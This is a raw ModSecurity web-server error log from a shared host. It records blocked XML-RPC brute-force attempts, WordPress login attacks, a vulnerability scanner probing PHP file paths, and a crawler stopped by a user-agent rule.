[Tue May 26 19:28:25.471485 2026] [security2:error] [pid 49598:tid 49845] [client 91.245.236.124:14255] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnAezJzkdc0WtdrwteDAAAAPo"]
[Tue May 26 19:28:25.595571 2026] [security2:error] [pid 49598:tid 49783] [client 20.63.34.22:12240] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/aboutc.php"] [unique_id "ahWnAezJzkdc0WtdrwteEAAAALw"]
[Tue May 26 19:28:25.595723 2026] [security2:error] [pid 49598:tid 49783] [client 20.63.34.22:12240] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/aboutc.php"] [unique_id "ahWnAezJzkdc0WtdrwteEAAAALw"]
[Tue May 26 19:28:25.601011 2026] [security2:error] [pid 49598:tid 49833] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnAezJzkdc0WtdrwteBQAAAO4"]
[Tue May 26 19:28:25.821761 2026] [security2:error] [pid 49598:tid 49751] [client 189.197.217.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnAezJzkdc0WtdrwteCwAAAJw"]
[Tue May 26 19:28:26.290369 2026] [security2:error] [pid 49598:tid 49732] [client 91.245.236.124:48455] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnAuzJzkdc0WtdrwteIQAAAIk"]
[Tue May 26 19:28:26.290496 2026] [security2:error] [pid 49598:tid 49732] [client 91.245.236.124:48455] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnAuzJzkdc0WtdrwteIQAAAIk"]
[Tue May 26 19:28:26.801369 2026] [security2:error] [pid 49598:tid 49736] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnAuzJzkdc0WtdrwteJwAAAI0"]
[Tue May 26 19:28:27.057505 2026] [security2:error] [pid 49598:tid 49753] [client 91.245.236.124:35039] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnA-zJzkdc0WtdrwteMQAAAJ4"]
[Tue May 26 19:28:27.057674 2026] [security2:error] [pid 49598:tid 49753] [client 91.245.236.124:35039] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnA-zJzkdc0WtdrwteMQAAAJ4"]
[Tue May 26 19:28:27.163302 2026] [security2:error] [pid 49598:tid 49832] [client 20.63.34.22:12280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-load.php"] [unique_id "ahWnA-zJzkdc0WtdrwteNgAAAO0"]
[Tue May 26 19:28:27.163407 2026] [security2:error] [pid 49598:tid 49832] [client 20.63.34.22:12280] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-load.php"] [unique_id "ahWnA-zJzkdc0WtdrwteNgAAAO0"]
[Tue May 26 19:28:27.763196 2026] [security2:error] [pid 49598:tid 49761] [client 20.63.34.22:12225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/aevly.php"] [unique_id "ahWnA-zJzkdc0WtdrwteRwAAAKY"]
[Tue May 26 19:28:27.763327 2026] [security2:error] [pid 49598:tid 49761] [client 20.63.34.22:12225] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/aevly.php"] [unique_id "ahWnA-zJzkdc0WtdrwteRwAAAKY"]
[Tue May 26 19:28:27.830106 2026] [security2:error] [pid 49598:tid 49833] [client 91.245.236.124:50011] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnA-zJzkdc0WtdrwteSAAAAO4"]
[Tue May 26 19:28:27.830289 2026] [security2:error] [pid 49598:tid 49833] [client 91.245.236.124:50011] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnA-zJzkdc0WtdrwteSAAAAO4"]
[Tue May 26 19:28:28.582851 2026] [security2:error] [pid 49598:tid 49793] [client 20.63.34.22:12286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/atkno.php"] [unique_id "ahWnBOzJzkdc0WtdrwteXwAAAMY"]
[Tue May 26 19:28:28.582964 2026] [security2:error] [pid 49598:tid 49793] [client 20.63.34.22:12286] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/atkno.php"] [unique_id "ahWnBOzJzkdc0WtdrwteXwAAAMY"]
[Tue May 26 19:28:28.605649 2026] [security2:error] [pid 49598:tid 49728] [client 91.245.236.124:34501] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnBOzJzkdc0WtdrwteYAAAAIU"]
[Tue May 26 19:28:28.605747 2026] [security2:error] [pid 49598:tid 49728] [client 91.245.236.124:34501] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnBOzJzkdc0WtdrwteYAAAAIU"]
[Tue May 26 19:28:29.073787 2026] [security2:error] [pid 49598:tid 49599] [remote 206.189.187.127:35206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.187.189.206.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnBOzJzkdc0WtdrwteYwAAmQA"]
[Tue May 26 19:28:29.086110 2026] [security2:error] [pid 49598:tid 49831] [client 20.63.34.22:12246] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/mini.php"] [unique_id "ahWnBezJzkdc0WtdrwtebAAAAOw"]
[Tue May 26 19:28:29.086200 2026] [security2:error] [pid 49598:tid 49831] [client 20.63.34.22:12246] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/mini.php"] [unique_id "ahWnBezJzkdc0WtdrwtebAAAAOw"]
[Tue May 26 19:28:29.372758 2026] [security2:error] [pid 49598:tid 49757] [client 91.245.236.124:40893] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnBezJzkdc0WtdrwtecAAAAKI"]
[Tue May 26 19:28:29.372858 2026] [security2:error] [pid 49598:tid 49757] [client 91.245.236.124:40893] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnBezJzkdc0WtdrwtecAAAAKI"]
[Tue May 26 19:28:29.518533 2026] [security2:error] [pid 49598:tid 49803] [client 20.63.34.22:12165] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-thi.php"] [unique_id "ahWnBezJzkdc0WtdrwtecQAAANA"]
[Tue May 26 19:28:29.518638 2026] [security2:error] [pid 49598:tid 49803] [client 20.63.34.22:12165] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-thi.php"] [unique_id "ahWnBezJzkdc0WtdrwtecQAAANA"]
[Tue May 26 19:28:29.671108 2026] [security2:error] [pid 49598:tid 49828] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnBezJzkdc0WtdrwtebwAAAOk"]
[Tue May 26 19:28:30.019355 2026] [security2:error] [pid 49598:tid 49760] [client 20.63.34.22:12168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-kd4xalrg7m.php"] [unique_id "ahWnBuzJzkdc0WtdrwteggAAAKU"]
[Tue May 26 19:28:30.019482 2026] [security2:error] [pid 49598:tid 49760] [client 20.63.34.22:12168] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-kd4xalrg7m.php"] [unique_id "ahWnBuzJzkdc0WtdrwteggAAAKU"]
[Tue May 26 19:28:30.143609 2026] [security2:error] [pid 49598:tid 49835] [client 91.245.236.124:25129] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnBuzJzkdc0WtdrwteiQAAAPA"]
[Tue May 26 19:28:30.143725 2026] [security2:error] [pid 49598:tid 49835] [client 91.245.236.124:25129] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnBuzJzkdc0WtdrwteiQAAAPA"]
[Tue May 26 19:28:30.568825 2026] [security2:error] [pid 49598:tid 49730] [client 20.63.34.22:12284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/amax.php"] [unique_id "ahWnBuzJzkdc0WtdrwtenAAAAIc"]
[Tue May 26 19:28:30.568914 2026] [security2:error] [pid 49598:tid 49730] [client 20.63.34.22:12284] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/amax.php"] [unique_id "ahWnBuzJzkdc0WtdrwtenAAAAIc"]
[Tue May 26 19:28:30.821785 2026] [security2:error] [pid 49598:tid 49608] [remote 141.95.202.18:39104] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnBuzJzkdc0WtdrwteoAAAlQk"]
[Tue May 26 19:28:30.907214 2026] [security2:error] [pid 49598:tid 49763] [client 91.245.236.124:63857] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnBuzJzkdc0WtdrwteoQAAAKg"]
[Tue May 26 19:28:30.907327 2026] [security2:error] [pid 49598:tid 49763] [client 91.245.236.124:63857] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnBuzJzkdc0WtdrwteoQAAAKg"]
[Tue May 26 19:28:30.983497 2026] [security2:error] [pid 49598:tid 49758] [client 20.63.34.22:12260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wehrman.php"] [unique_id "ahWnBuzJzkdc0WtdrwtepAAAAKM"]
[Tue May 26 19:28:30.983590 2026] [security2:error] [pid 49598:tid 49758] [client 20.63.34.22:12260] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wehrman.php"] [unique_id "ahWnBuzJzkdc0WtdrwtepAAAAKM"]
[Tue May 26 19:28:31.496970 2026] [security2:error] [pid 49598:tid 49772] [client 20.63.34.22:12178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/b.php"] [unique_id "ahWnB-zJzkdc0WtdrwtesQAAALE"]
[Tue May 26 19:28:31.497069 2026] [security2:error] [pid 49598:tid 49772] [client 20.63.34.22:12178] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/b.php"] [unique_id "ahWnB-zJzkdc0WtdrwtesQAAALE"]
[Tue May 26 19:28:31.670463 2026] [security2:error] [pid 49598:tid 49802] [client 91.245.236.124:17205] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnB-zJzkdc0WtdrwtevAAAAM8"]
[Tue May 26 19:28:31.670632 2026] [security2:error] [pid 49598:tid 49802] [client 91.245.236.124:17205] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnB-zJzkdc0WtdrwtevAAAAM8"]
[Tue May 26 19:28:31.794168 2026] [security2:error] [pid 49598:tid 49757] [client 114.119.155.111:36393] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.jhonweb.com"] [uri "/project/avalturistica/"] [unique_id "ahWnB-zJzkdc0WtdrwtewAAAAKI"], referer: https://www.jhonweb.com/project_category/web-corporativa
[Tue May 26 19:28:31.905098 2026] [security2:error] [pid 49598:tid 49777] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnB-zJzkdc0WtdrwtesgAAALY"]
[Tue May 26 19:28:32.252516 2026] [security2:error] [pid 49598:tid 49808] [client 20.63.34.22:12257] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-sing.php"] [unique_id "ahWnCOzJzkdc0WtdrwtexwAAANU"]
[Tue May 26 19:28:32.252659 2026] [security2:error] [pid 49598:tid 49808] [client 20.63.34.22:12257] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-sing.php"] [unique_id "ahWnCOzJzkdc0WtdrwtexwAAANU"]
[Tue May 26 19:28:32.450203 2026] [security2:error] [pid 49598:tid 49741] [client 91.245.236.124:9045] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnCOzJzkdc0WtdrwteyAAAAJI"]
[Tue May 26 19:28:32.450320 2026] [security2:error] [pid 49598:tid 49741] [client 91.245.236.124:9045] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnCOzJzkdc0WtdrwteyAAAAJI"]
[Tue May 26 19:28:32.579698 2026] [security2:error] [pid 49598:tid 49614] [remote 216.73.216.30:13888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWnCOzJzkdc0WtdrwteyQAAlA8"]
[Tue May 26 19:28:32.910320 2026] [security2:error] [pid 49598:tid 49769] [client 20.63.34.22:12237] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-links-opml.php"] [unique_id "ahWnCOzJzkdc0Wtdrwte0wAAAK4"]
[Tue May 26 19:28:32.910471 2026] [security2:error] [pid 49598:tid 49769] [client 20.63.34.22:12237] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-links-opml.php"] [unique_id "ahWnCOzJzkdc0Wtdrwte0wAAAK4"]
[Tue May 26 19:28:33.220178 2026] [security2:error] [pid 49598:tid 49842] [client 91.245.236.124:49965] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnCezJzkdc0Wtdrwte3QAAAPc"]
[Tue May 26 19:28:33.220297 2026] [security2:error] [pid 49598:tid 49842] [client 91.245.236.124:49965] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnCezJzkdc0Wtdrwte3QAAAPc"]
[Tue May 26 19:28:33.923810 2026] [security2:error] [pid 49598:tid 49725] [remote 185.190.18.72:56600] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.18.190.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahWnCezJzkdc0Wtdrwte5QAA2H4"]
[Tue May 26 19:28:33.939499 2026] [security2:error] [pid 49598:tid 49715] [remote 50.6.192.190:56640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnCezJzkdc0Wtdrwte4wAApHQ"]
[Tue May 26 19:28:33.998465 2026] [security2:error] [pid 49598:tid 49758] [client 91.245.236.124:12331] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnCezJzkdc0Wtdrwte5gAAAKM"]
[Tue May 26 19:28:33.998566 2026] [security2:error] [pid 49598:tid 49758] [client 91.245.236.124:12331] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnCezJzkdc0Wtdrwte5gAAAKM"]
[Tue May 26 19:28:34.443011 2026] [security2:error] [pid 49598:tid 49798] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnCuzJzkdc0Wtdrwte7AAAAMs"]
[Tue May 26 19:28:34.741848 2026] [security2:error] [pid 49598:tid 49765] [client 20.63.34.22:12194] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahWnCuzJzkdc0Wtdrwte_QAAAKo"]
[Tue May 26 19:28:34.741940 2026] [security2:error] [pid 49598:tid 49765] [client 20.63.34.22:12194] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahWnCuzJzkdc0Wtdrwte_QAAAKo"]
[Tue May 26 19:28:34.765259 2026] [security2:error] [pid 49598:tid 49821] [client 91.245.236.124:27489] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnCuzJzkdc0Wtdrwte_gAAAOI"]
[Tue May 26 19:28:34.765376 2026] [security2:error] [pid 49598:tid 49821] [client 91.245.236.124:27489] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnCuzJzkdc0Wtdrwte_gAAAOI"]
[Tue May 26 19:28:34.826850 2026] [security2:error] [pid 49598:tid 49618] [remote 50.6.192.190:56640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnCuzJzkdc0Wtdrwte_AAAiRM"], referer: https://freshmindsolutions.com/wp-login.php
